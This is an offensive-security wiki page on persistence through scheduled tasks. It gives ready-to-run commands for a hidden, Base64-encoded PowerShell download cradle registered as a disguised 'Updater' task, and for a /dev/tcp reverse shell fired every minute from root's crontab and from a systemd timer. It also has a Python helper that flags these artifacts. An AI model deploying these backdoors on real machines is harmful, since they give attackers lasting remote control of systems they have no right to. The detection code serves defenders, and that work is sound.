# Task Scheduler

Installing a backdoor in the task scheduler lets a beacon connection persist on a chosen interval or at a chosen time.

## Abuse

{% tabs %}
{% tab title="Windows" %}

<pre class="language-powershell"><code class="lang-powershell"><strong># Store the Invoke-Expression download command as Base64
</strong>$str = 'iex ((new-object net.webclient).downloadstring("http://example.com/reverse.ps1"))'
[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))

<strong># Create the Updater scheduled task
</strong>$TaskName = "Updater"
$PSEXE = "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
$EncodedArgs = "-nop -w hidden -enc &#x3C;Base64 Encoded Command>"
$Action = New-ScheduledTaskAction -Execute $PSEXE -Argument $EncodedArgs
$Trigger = New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1) -RepetitionDuration (New-TimeSpan -Days 365)
$Principal = New-ScheduledTaskPrincipal -UserId "$env:USERNAME" -LogonType Interactive
Register-ScheduledTask -TaskName $TaskName -Action $Action -Trigger $Trigger -Principal $Principal
</code></pre>

{% endtab %}

{% tab title="UNIX" %}

<pre class="language-bash" data-title="Cron scheduler"><code class="lang-bash"><strong># Write the reverse shell script and make it executable
</strong>echo -e '#!/bin/bash\nsh -i >&#x26; /dev/tcp/192.168.1.9/1337 0>&#x26;1' > rev.sh
chmod +x rev.sh

<strong># Register the script in the cron scheduler and verify
</strong>echo '* * * * * root /tmp/rev.sh' >> /etc/crontab
tail -f /var/log/syslog | grep CRON
</code></pre>

<pre class="language-bash" data-title="Systemd Timer"><code class="lang-bash"><strong># Register the service in a systemd unit file and grant execute permission
</strong>echo -e '[Service]\nExecStart=/bin/bash &#x3C;PATH>' > /etc/systemd/system/rev.service
chmod +x rev.sh

<strong># Set the run schedule to second 00 of every minute
</strong>echo -e '[Timer]\nOnCalendar=*-*-* *:*:00\nPersistent=true\n[Install]\nWantedBy=timers.target' > /etc/systemd/system/rev.timer

<strong># Reload the daemon, enable the timer, and verify
</strong>systemctl daemon-reload
systemctl enable --now rev.timer
systemctl list-timers
</code></pre>

{% endtab %}
{% endtabs %}
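The commands in both tabs leave recognisable artifacts: a task action carrying `-w hidden` and `-enc`, a root crontab entry that fires every minute from `/tmp`, and a timer with a per-minute `OnCalendar`. The following triage helper is an added example, not part of the original page; its function names, finding labels and sample strings are assumptions constructed for illustration.

```python
import base64
import re

WORLD_WRITABLE = re.compile(r"(?:^|\s)/(?:tmp|var/tmp|dev/shm)/")
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-e(?:c|n\w*)?\s+([A-Za-z0-9+/=]{8,})")
HIDDEN_FLAG = re.compile(r"(?i)(?:^|\s)-w\w*\s+hidden\b")
EVERY_MINUTE = {"minutely", "*-*-* *:*:00", "*:*:00", "*:*"}  # common spellings


def audit_task_arguments(arguments):
    """Return (findings, decoded) for a Windows scheduled-task action argument string."""
    findings, decoded = [], None
    if HIDDEN_FLAG.search(arguments):
        findings.append("hidden-window")
    match = ENC_FLAG.search(arguments)
    if match:
        findings.append("encoded-command")
        try:  # -EncodedCommand payloads are Base64 over UTF-16LE text
            decoded = base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
        except ValueError:  # bad Base64 or not UTF-16LE: leave undecoded
            decoded = None
    return findings, decoded


def audit_crontab_line(line):
    """Return findings for one /etc/crontab entry: five time fields, user, command."""
    fields = line.strip().split(None, 6)
    if len(fields) < 7 or fields[0].startswith("#"):
        return []
    checks = {
        "every-minute": fields[:5] == ["*"] * 5,
        "root-job-in-world-writable-dir": fields[5] == "root" and bool(WORLD_WRITABLE.search(fields[6])),
        "dev-tcp-redirect": "/dev/tcp/" in fields[6],
    }
    return [name for name, hit in checks.items() if hit]


def audit_timer_unit(text):
    """Return findings for the text of a systemd .timer unit."""
    schedules = re.findall(r"(?m)^\s*OnCalendar\s*=\s*(.+?)\s*$", text)
    return ["every-minute"] if any(s in EVERY_MINUTE for s in schedules) else []


# Constructed sample input, modelled on the commands shown on this page.
PAGE_COMMAND = 'iex ((new-object net.webclient).downloadstring("http://example.com/reverse.ps1"))'
SAMPLE_ARGS = "-nop -w hidden -enc " + base64.b64encode(PAGE_COMMAND.encode("utf-16-le")).decode()
SAMPLE_CRON = "* * * * * root /tmp/rev.sh"
SAMPLE_TIMER = "[Timer]\nOnCalendar=*-*-* *:*:00\nPersistent=true\n"
```

Feed it the `Arguments` of each scheduled-task action, the lines of `/etc/crontab`, and the contents of `.timer` units under `/etc/systemd/system`; any non-empty findings list is a lead for review, not a verdict.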

## References

{% embed url="<https://attack.mitre.org/techniques/T1053/006/>" %}


